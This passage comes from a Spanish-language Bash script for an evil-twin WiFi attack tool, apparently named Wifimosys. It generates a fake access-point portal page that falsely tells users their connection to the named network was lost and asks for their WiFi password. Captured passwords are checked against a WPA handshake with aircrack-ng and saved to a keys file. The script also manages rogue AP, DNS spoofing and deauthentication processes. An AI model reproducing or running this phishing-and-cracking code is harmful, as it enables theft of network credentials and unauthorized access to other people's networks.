	echo -e \"$yellow    CLIENTES QUE SE HAN CONECTADO:""$color\"
	x=0
	for line in \"\${CLIENTESDHCP[@]}\"; do
	  x=\$((\$x+1))
	echo -e \"    "$green"\$x) "$red"\$(echo \$line| cut -d \" \" -f 3) "$yellow"\$(echo \$line| cut -d \" \" -f 5) "$green"\$(echo \$line| cut -d \" \" -f 6)"$color"\"   
	done
	echo
	for FALLO in $RUTATEMP/fallidos.txt; do
	echo -e \"    "$red      "\$(cat $RUTATEMP/fallidos.txt)"$color"\"
	done
	echo -ne \"\033[H\033[u\"">>$RUTATEMP/handcheck
	
	echo "let i=\$i+1
	sleep 1">>$RUTATEMP/handcheck

	echo "done
	clear
	echo \"1\" > $RUTATEMP/status.txt

	sleep 3

	killall airbase-ng &>$nula
	kill \$(ps a | grep python| grep fakedns | awk '{print \$1}') &>$nula
	killall hostapd &>$nula
	killall lighttpd &>$nula
	killall dhcpd &>$nula
	killall python &>$nula
	
	echo \"
	WIFIMOSYS $version by Absolut Vodker

	Nombre de la red: $Host_SSID
	MAC: $Host_MAC ($Host_MAC_MODEL)
	Canal: $Host_CHAN
	Seguridad: $Host_ENC
	Tiempo de ataque: \$ih\$horas:\$im\$minutos:\$is\$segundos
	Contraseña: \$(cat $RUTATEMP/data.txt)
	
	
	¡Gracias por usar Wifimosys!
	\" >/opt/Wireless-Keys/$Host_SSID-Wifimosys.txt">>$RUTATEMP/handcheck
	
	echo "aircrack-ng -a 2 -b $Host_MAC -0 -s $RUTATEMP/$Host_MAC-01.cap -w $RUTATEMP/data.txt && echo 
	">>$RUTATEMP/handcheck
	
	echo "kill -INT \$(ps a | grep bash| grep wifim | awk '{print \$1}') &>$nula">>$RUTATEMP/handcheck
	chmod +x $RUTATEMP/handcheck
}

##################################### Cierra todos los procesos

function matartodo {

	killall python &>$nula
	killall mdk3 &>$nula
	kill $(ps a | grep python| grep fakedns | awk '{print $1}') &>$nula
	killall hostapd &>$nula
	killall lighttpd &>$nula
	killall dhcpd &>$nula
	killall xterm &>$nula
	killall wpa_supplicant &>$nula
        killall wpa_passphrase &>$nula
}

##################################### Crea el contenido del Fake AP

function FAKEAP {

	if [ ! -d $RUTATEMP/data ]; then
		mkdir $RUTATEMP/data
	fi
	CONSEGUIDO="Su conexi&oacute;n se restablecer&aacute; en breves momentos."
	echo "<!DOCTYPE html>
	<html>
	<head>
	    <title>error</title>
	    <meta name=\"viewport\" content=\"width=device-width, height=device-height, initial-scale=1.0\"/>
	    <style>
	.ui-btn {
	    width: 20% !important;
	}
	</style>
	</head>
	<body>
	    <div data-role=\"page\" id=\"login\" data-theme=\"b\">
		<div data-role=\"top\" data-theme=\"a\">
		    <h3>Clave correcta</h3>
		</div>

		<div data-role=\"content\">

	"$CONSEGUIDO"
		</div>

		<div data-theme=\"a\" data-role=\"footer\" data-position=\"fixed\">

		</div>
	    </div>
	    <div data-role=\"page\" id=\"second\">
		<div data-theme=\"a\" data-role=\"top\">
		    <h3></h3>
		</div>

		<div data-role=\"content\">

		</div>

		<div data-theme=\"a\" data-role=\"footer\" data-position=\"fixed\">
		</div>
	    </div>
	</body>
	</html>
	">$RUTATEMP/data/final.html

	echo "<!DOCTYPE html>
<html>
<head>
  <meta http-equiv=\"content-type\" content=\"text/html; charset=iso-8859-1\">
  <title>error</title>
  <meta name=\"viewport\"
  content=\"width=device-width, height=device-height, initial-scale=1.0\">
</head>
<body>
<div id=\"error\">
<body style=\"color: white; background-color: black;\" alink=\"#000099\" link=\"#000099\" vlink=\"#990099\">
<h3 style=\"text-align:center;margin-left:auto;margin-right:auto;\">Se ha perdido la conexi&oacute;n con <b>$Host_SSID</b></h3>
<h4 style=\"text-align:center;margin-left:auto;margin-right:auto;\">Para volver a conectar introduzca su contrase&ntilde;a WIFI:</b></h3>
</div>

<div>
  <form id=\"check-user\" class=\"ui-body ui-body-a ui-corner-all\"
  action=\"check.php\" method=\"POST\"
  style=\"text-align:center;margin-left:auto;margin-right:auto;\">
    <div>
    <input type=\"password\" value=\"\" name=\"key1\" id=\"key1\">
    <p>
    <input type=\"submit\" value=\"Aceptar\" name=\"submit\" id=\"submit\"> </p>
  </form>
</div>
</body>
</html>
	">$RUTATEMP/data/index.htm
}
limpialog
top&& setinterface